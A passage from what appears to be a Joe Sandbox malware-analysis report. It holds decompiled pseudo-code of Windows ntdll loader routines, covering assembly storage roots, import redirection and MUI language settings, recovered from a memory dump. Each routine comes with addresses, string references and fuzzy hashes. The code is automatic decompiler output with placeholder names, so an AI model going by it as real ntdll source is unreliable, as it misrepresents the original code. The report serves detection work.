						E058DEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E0588265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E058DEF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E05882919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E058DEF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}














                                                                                                                    0x05882594
                                                                                                                    0x05882594
                                                                                                                    0x0588259c
                                                                                                                    0x058825a6
                                                                                                                    0x058825a9
                                                                                                                    0x058825ac
                                                                                                                    0x058825b6
                                                                                                                    0x058c1f77
                                                                                                                    0x00000000
                                                                                                                    0x058825bc
                                                                                                                    0x058825bc
                                                                                                                    0x058825c1
                                                                                                                    0x058825c3
                                                                                                                    0x058825c3
                                                                                                                    0x058825c5
                                                                                                                    0x058825ce
                                                                                                                    0x058c1fbc
                                                                                                                    0x058c1fc1
                                                                                                                    0x058c1fc2
                                                                                                                    0x058c1fc3
                                                                                                                    0x058c1fd1
                                                                                                                    0x00000000
                                                                                                                    0x058825e5
                                                                                                                    0x058825fc
                                                                                                                    0x05882600
                                                                                                                    0x058c1f81
                                                                                                                    0x058c1f82
                                                                                                                    0x00000000
                                                                                                                    0x05882606
                                                                                                                    0x05882606
                                                                                                                    0x0588260b
                                                                                                                    0x0588264a
                                                                                                                    0x0588264a
                                                                                                                    0x0588260d
                                                                                                                    0x0588260d
                                                                                                                    0x05882612
                                                                                                                    0x05882655
                                                                                                                    0x05882655
                                                                                                                    0x05882614
                                                                                                                    0x05882614
                                                                                                                    0x05882619
                                                                                                                    0x00000000
                                                                                                                    0x0588261b
                                                                                                                    0x0588261e
                                                                                                                    0x058c1fa0
                                                                                                                    0x058c1fa3
                                                                                                                    0x058c1fb2
                                                                                                                    0x058c1fd9
                                                                                                                    0x058c1fd9
                                                                                                                    0x05882624
                                                                                                                    0x0588262e
                                                                                                                    0x05882632
                                                                                                                    0x058c1f89
                                                                                                                    0x058c1f8a
                                                                                                                    0x058c1f8f
                                                                                                                    0x058c1f8f
                                                                                                                    0x058c1f91
                                                                                                                    0x058c1f93
                                                                                                                    0x05882638
                                                                                                                    0x0588263e
                                                                                                                    0x05882643
                                                                                                                    0x00000000
                                                                                                                    0x05882645
                                                                                                                    0x05882648
                                                                                                                    0x00000000
                                                                                                                    0x05882648
                                                                                                                    0x05882643
                                                                                                                    0x05882632
                                                                                                                    0x0588261e
                                                                                                                    0x05882619
                                                                                                                    0x05882612
                                                                                                                    0x0588260b
                                                                                                                    0x05882600
                                                                                                                    0x058825ce
                                                                                                                    0x05882652

                                                                                                                    Strings
                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 058C1F82
                                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 058C1F6A, 058C1FA4, 058C1FC4
                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 058C1F8A
                                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 058C1FA9
                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 058C1FC9
                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 058C1F6F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                    • API String ID: 0-861424205
                                                                                                                    • Opcode ID: 035f4e9829b83fa7ab217917a6c5b109a5f6f046e0417fcc8929f0d051b6f8bf
                                                                                                                    • Instruction ID: f893431aaee16a8e4f075a5d95264743a974233b229307d5135ebb10554b05bb
                                                                                                                    • Opcode Fuzzy Hash: 035f4e9829b83fa7ab217917a6c5b109a5f6f046e0417fcc8929f0d051b6f8bf
                                                                                                                    • Instruction Fuzzy Hash: E7310C76B042187BE710EA898C8AF7BBBA9EB41A54F054199BD02F7341D374EE00C7E5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E0588C5C6() {
				signed int _v8;
				signed int _v24;
				char _v92;
				char _v96;
				char _v97;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed char _t52;
				void* _t58;
				intOrPtr _t65;
				intOrPtr* _t72;
				void* _t73;
				signed int _t75;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t79 = (_t77 & 0xfffffff8) - 0x64;
				_v8 =  *0x594b370 ^ _t79;
				_t72 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x2a4;
				_t75 = 0;
				if( *_t72 != 0) {
					__eflags =  *0x59437c0 & 0x00000005;
					if(( *0x59437c0 & 0x00000005) != 0) {
						E058CE692("minkernel\\ntdll\\ldrredirect.c", 0x23c, "LdrpInitializeImportRedirection", 2, "Loading import redirection DLL: \'%wZ\'\n", _t72);
						_t79 = _t79 + 0x18;
					}
					E05898F40( &_v92, 0, 0x50);
					_t79 = _t79 + 0xc;
					_t68 =  &_v92;
					_t59 = _t72;
					_t75 = E05846B45(_t72,  &_v92, 0x1000001,  &_v96);
					__eflags = _v24;
					if(_v24 != 0) {
						E0587E7E0(_t59, _v92);
					}
					__eflags = _t75;
					if(__eflags >= 0) {
						_t75 = E058D4348(_v96, __eflags);
						__eflags = _t75;
						if(_t75 >= 0) {
							E058719DF(0);
							E05872755(_t68);
							_v97 = 0;
							_t65 =  *((intOrPtr*)(_v96 + 0x50));
							_t42 = E05871934(_t65, 0,  &_v97);
							_push(_t65);
							_t75 = _t42;
							_push(_t75);
							_t68 = 2;
							E0587270D(_t68);
							E058879F9(__eflags);
							__eflags = _t75;
							if(_t75 >= 0) {
								 *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) =  *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) | 0xffffffff;
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x50)))) - 0x1c)) = 0xffff;
								E058D05C6(_v100, _t68);
								 *0x5945c9c = _v100;
							}
						} else {
							_t52 =  *0x59437c0; // 0x0
							__eflags = _t52 & 0x00000003;
							if((_t52 & 0x00000003) != 0) {
								E058CE692("minkernel\\ntdll\\ldrredirect.c", 0x257, "LdrpInitializeImportRedirection", 0, "Unable to build import redirection Table, Status = 0x%x\n", _t75);
								_t52 =  *0x59437c0; // 0x0
								_t79 = _t79 + 0x18;
							}
							__eflags = _t52 & 0x00000010;
							if((_t52 & 0x00000010) != 0) {
								asm("int3");
							}
						}
					}
				}
				_pop(_t73);
				_pop(_t76);
				_pop(_t58);
				return E05894B50(_t75, _t58, _v8 ^ _t79, _t68, _t73, _t76);
			}






















                                                                                                                    0x0588c5ce
                                                                                                                    0x0588c5d8
                                                                                                                    0x0588c5ea
                                                                                                                    0x0588c5f0
                                                                                                                    0x0588c5f5
                                                                                                                    0x058c7f71
                                                                                                                    0x058c7f78
                                                                                                                    0x058c7f91
                                                                                                                    0x058c7f96
                                                                                                                    0x058c7f96
                                                                                                                    0x058c7fa1
                                                                                                                    0x058c7fa6
                                                                                                                    0x058c7fad
                                                                                                                    0x058c7fb1
                                                                                                                    0x058c7fbe
                                                                                                                    0x058c7fc0
                                                                                                                    0x058c7fc4
                                                                                                                    0x058c7fca
                                                                                                                    0x058c7fca
                                                                                                                    0x058c7fcf
                                                                                                                    0x058c7fd1
                                                                                                                    0x058c7fe0
                                                                                                                    0x058c7fe2
                                                                                                                    0x058c7fe4
                                                                                                                    0x058c8022
                                                                                                                    0x058c8027
                                                                                                                    0x058c8037
                                                                                                                    0x058c803b
                                                                                                                    0x058c803e
                                                                                                                    0x058c8043
                                                                                                                    0x058c8044
                                                                                                                    0x058c8046
                                                                                                                    0x058c8049
                                                                                                                    0x058c804a
                                                                                                                    0x058c804f
                                                                                                                    0x058c8054
                                                                                                                    0x058c8056
                                                                                                                    0x058c8068
                                                                                                                    0x058c8075
                                                                                                                    0x058c807d
                                                                                                                    0x058c8086
                                                                                                                    0x058c8086
                                                                                                                    0x058c7fe6
                                                                                                                    0x058c7fe6
                                                                                                                    0x058c7feb
                                                                                                                    0x058c7fed
                                                                                                                    0x058c8005
                                                                                                                    0x058c800a
                                                                                                                    0x058c800f
                                                                                                                    0x058c800f
                                                                                                                    0x058c8012
                                                                                                                    0x058c8014
                                                                                                                    0x058c801a
                                                                                                                    0x058c801a
                                                                                                                    0x058c8014
                                                                                                                    0x058c7fe4
                                                                                                                    0x058c7fd1
                                                                                                                    0x0588c601
                                                                                                                    0x0588c602
                                                                                                                    0x0588c603
                                                                                                                    0x0588c60e

                                                                                                                    Strings
                                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 058C7F7B
                                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 058C7FF0
                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 058C7F8C, 058C8000
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0588C5E3
                                                                                                                    • LdrpInitializeImportRedirection, xrefs: 058C7F82, 058C7FF6
                                                                                                                    • LdrpInitializeProcess, xrefs: 0588C5E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                    • API String ID: 0-475462383
                                                                                                                    • Opcode ID: b1b57f7b8af336e2c0ff6e2d23540c2e8b5344a01f623cda255e2e26bd0ac1d9
                                                                                                                    • Instruction ID: 4543141b4bb34afa6b0a9764f926309ce16c4ea7f9d6b582383fa91464dd9b9d
                                                                                                                    • Opcode Fuzzy Hash: b1b57f7b8af336e2c0ff6e2d23540c2e8b5344a01f623cda255e2e26bd0ac1d9
                                                                                                                    • Instruction Fuzzy Hash: 9C31B1717583059BC614EB2CD84AE2ABBD5EF84A50F04499CFC85EB391EA30DC05CBA3
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0587510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E05878BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E05878BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E05878BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E05878BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E05878BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E05865D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E058988C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E0589A8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E05895050(0,  &_v68, _t170);
									if(E058756E0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E05895050(_t257,  &_v68, _t243);
								if(E058756E0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E0589A8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E05865D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E058988C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E0589A8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E05895050(_t262,  &_v68, _t244);
								if(E058756E0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E0589A8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E05895050(_t262,  &_v68, _t201);
							if(E058756E0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E05865D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E058988C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E0589A8B0(_t280, ";");
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E05895050(_t267,  &_v68, _t245);
							if(E058756E0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E0589A8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E05895050(_t267,  &_v68, _t224);
						if(E058756E0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                    0x05875117
                                                                                                                    0x0587511d
                                                                                                                    0x0587511f
                                                                                                                    0x05875121
                                                                                                                    0x05875124
                                                                                                                    0x05875127
                                                                                                                    0x0587512a
                                                                                                                    0x0587512d
                                                                                                                    0x05875130
                                                                                                                    0x05875133
                                                                                                                    0x05875136
                                                                                                                    0x0587513a
                                                                                                                    0x0587513c
                                                                                                                    0x05875141
                                                                                                                    0x058bb9ab
                                                                                                                    0x058bb9b0
                                                                                                                    0x05875460
                                                                                                                    0x05875463
                                                                                                                    0x05875469
                                                                                                                    0x0587546f
                                                                                                                    0x05875475
                                                                                                                    0x0587547b
                                                                                                                    0x05875481
                                                                                                                    0x05875484
                                                                                                                    0x0587548a
                                                                                                                    0x05875491
                                                                                                                    0x05875496
                                                                                                                    0x05875496
                                                                                                                    0x0587515e
                                                                                                                    0x058bb9b7
                                                                                                                    0x058bb9c1
                                                                                                                    0x058bb9d0
                                                                                                                    0x058bb9d0
                                                                                                                    0x058bb9d5
                                                                                                                    0x058bb9d5
                                                                                                                    0x0587517b
                                                                                                                    0x0587518a
                                                                                                                    0x05875190
                                                                                                                    0x05875195
                                                                                                                    0x05875195
                                                                                                                    0x058751af
                                                                                                                    0x0587526f
                                                                                                                    0x05875286
                                                                                                                    0x05875348
                                                                                                                    0x0587535f
                                                                                                                    0x05875446
                                                                                                                    0x05875446
                                                                                                                    0x05875449
                                                                                                                    0x05875449
                                                                                                                    0x0587544b
                                                                                                                    0x0587544f
                                                                                                                    0x058bbae9
                                                                                                                    0x058bbae9
                                                                                                                    0x05875455
                                                                                                                    0x0587545a
                                                                                                                    0x058bbaf5
                                                                                                                    0x058bbb08
                                                                                                                    0x058bbb0f
                                                                                                                    0x058bbb11
                                                                                                                    0x058bbb14
                                                                                                                    0x058bbb14
                                                                                                                    0x058bbaf5
                                                                                                                    0x00000000
                                                                                                                    0x0587545a
                                                                                                                    0x05875368
                                                                                                                    0x05875368
                                                                                                                    0x0587536b
                                                                                                                    0x05875370
                                                                                                                    0x058bbaa5
                                                                                                                    0x058bbaa7
                                                                                                                    0x05875376
                                                                                                                    0x05875387
                                                                                                                    0x05875389
                                                                                                                    0x0587538c
                                                                                                                    0x0587538c
                                                                                                                    0x05875391
                                                                                                                    0x058bbaaf
                                                                                                                    0x058bbab2
                                                                                                                    0x00000000
                                                                                                                    0x05875397
                                                                                                                    0x0587539c
                                                                                                                    0x058753a4
                                                                                                                    0x058753b2
                                                                                                                    0x058753b5
                                                                                                                    0x058753b8
                                                                                                                    0x058753fc
                                                                                                                    0x058753fc
                                                                                                                    0x05875404
                                                                                                                    0x0587540b
                                                                                                                    0x0587541f
                                                                                                                    0x05875421
                                                                                                                    0x05875421
                                                                                                                    0x0587541f
                                                                                                                    0x05875424
                                                                                                                    0x058bbabf
                                                                                                                    0x058bbacc
                                                                                                                    0x058bbad1
                                                                                                                    0x058bbad4
                                                                                                                    0x0587542a
                                                                                                                    0x0587542a
                                                                                                                    0x0587542a
                                                                                                                    0x0587542c
                                                                                                                    0x05875431
                                                                                                                    0x0587543e
                                                                                                                    0x0587543e
                                                                                                                    0x05875443
                                                                                                                    0x00000000
                                                                                                                    0x05875443
                                                                                                                    0x058753ba
                                                                                                                    0x058753bd
                                                                                                                    0x058753bf
                                                                                                                    0x058753c2
                                                                                                                    0x058753ca
                                                                                                                    0x058753de
                                                                                                                    0x058753e0
                                                                                                                    0x058753e0
                                                                                                                    0x058753e7
                                                                                                                    0x058753ee
                                                                                                                    0x058753f1
                                                                                                                    0x058753f2
                                                                                                                    0x058753f6
                                                                                                                    0x058753f9
                                                                                                                    0x00000000
                                                                                                                    0x058753f9
                                                                                                                    0x05875391
                                                                                                                    0x0587528f
                                                                                                                    0x0587528f
                                                                                                                    0x05875292
                                                                                                                    0x05875297
                                                                                                                    0x058bba41
                                                                                                                    0x058bba43
                                                                                                                    0x0587529d
                                                                                                                    0x058752ae
                                                                                                                    0x058752b0
                                                                                                                    0x058752b3
                                                                                                                    0x058752b3
                                                                                                                    0x058752b8
                                                                                                                    0x058bba4b
                                                                                                                    0x058bba4e
                                                                                                                    0x00000000
                                                                                                                    0x058752be
                                                                                                                    0x058752c3
                                                                                                                    0x058752c8
                                                                                                                    0x058752cb
                                                                                                                    0x058752ce
                                                                                                                    0x058752dd
                                                                                                                    0x058752e0
                                                                                                                    0x058752e3
                                                                                                                    0x058bba58
                                                                                                                    0x058bba5b
                                                                                                                    0x058bba5d
                                                                                                                    0x058bba60
                                                                                                                    0x058bba68
                                                                                                                    0x058bba7c
                                                                                                                    0x058bba7e
                                                                                                                    0x058bba7e
                                                                                                                    0x058bba85
                                                                                                                    0x058bba8c
                                                                                                                    0x058bba8f
                                                                                                                    0x058bba90
                                                                                                                    0x058bba94
                                                                                                                    0x058bba97
                                                                                                                    0x058bba97
                                                                                                                    0x058752e9
                                                                                                                    0x058752ec
                                                                                                                    0x058752f1
                                                                                                                    0x058752f8
                                                                                                                    0x0587530c
                                                                                                                    0x058bba9f
                                                                                                                    0x058bba9f
                                                                                                                    0x0587530c
                                                                                                                    0x05875314
                                                                                                                    0x05875323
                                                                                                                    0x05875328
                                                                                                                    0x0587532b
                                                                                                                    0x0587532b
                                                                                                                    0x0587532e
                                                                                                                    0x05875333
                                                                                                                    0x05875340
                                                                                                                    0x05875340
                                                                                                                    0x05875345
                                                                                                                    0x00000000
                                                                                                                    0x05875345
                                                                                                                    0x058752b8
                                                                                                                    0x058751b8
                                                                                                                    0x058751b8
                                                                                                                    0x058751bb
                                                                                                                    0x058751c0
                                                                                                                    0x058bb9dd
                                                                                                                    0x058751c6
                                                                                                                    0x058751d2
                                                                                                                    0x058751d7
                                                                                                                    0x058751d9
                                                                                                                    0x058751dc
                                                                                                                    0x058751dc
                                                                                                                    0x058751e1
                                                                                                                    0x058bb9e5
                                                                                                                    0x058bb9e7
                                                                                                                    0x058bb9ec
                                                                                                                    0x00000000
                                                                                                                    0x058751e7
                                                                                                                    0x058751ec
                                                                                                                    0x058751f1
                                                                                                                    0x058751f4
                                                                                                                    0x05875204
                                                                                                                    0x05875207
                                                                                                                    0x0587520a
                                                                                                                    0x058bb9f4
                                                                                                                    0x058bb9f7
                                                                                                                    0x058bb9f9
                                                                                                                    0x058bb9fc
                                                                                                                    0x058bba04
                                                                                                                    0x058bba18
                                                                                                                    0x058bba1a
                                                                                                                    0x058bba1a
                                                                                                                    0x058bba21
                                                                                                                    0x058bba28
                                                                                                                    0x058bba2b
                                                                                                                    0x058bba2c
                                                                                                                    0x058bba30
                                                                                                                    0x058bba33
                                                                                                                    0x058bba33
                                                                                                                    0x05875210
                                                                                                                    0x05875213
                                                                                                                    0x05875218
                                                                                                                    0x0587521f
                                                                                                                    0x05875233
                                                                                                                    0x058bba3b
                                                                                                                    0x058bba3b
                                                                                                                    0x05875233
                                                                                                                    0x0587523b
                                                                                                                    0x0587524a
                                                                                                                    0x0587524f
                                                                                                                    0x05875252
                                                                                                                    0x05875252
                                                                                                                    0x05875255
                                                                                                                    0x0587525a
                                                                                                                    0x05875267
                                                                                                                    0x05875267
                                                                                                                    0x0587526c
                                                                                                                    0x00000000
                                                                                                                    0x0587526c

                                                                                                                    Strings
                                                                                                                    • WindowsExcludedProcs, xrefs: 0587514A
                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 05875272
                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 05875167
                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 0587534B
                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 0587519B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                    • API String ID: 0-258546922
                                                                                                                    • Opcode ID: e6ed85d3c6565472d48bfa60185635f86cbb6a516e639db3c1edc59dc63642fb
                                                                                                                    • Instruction ID: b7656e6572ba22c70f251c298c73a06d483dd3ee5b942c3900ed87dd389484f0
                                                                                                                    • Opcode Fuzzy Hash: e6ed85d3c6565472d48bfa60185635f86cbb6a516e639db3c1edc59dc63642fb
                                                                                                                    • Instruction Fuzzy Hash: 46F14DB2E15219EFDB15DF98C984AEEBBB9FF48610F14445AE901E7210E770DE01CBA0
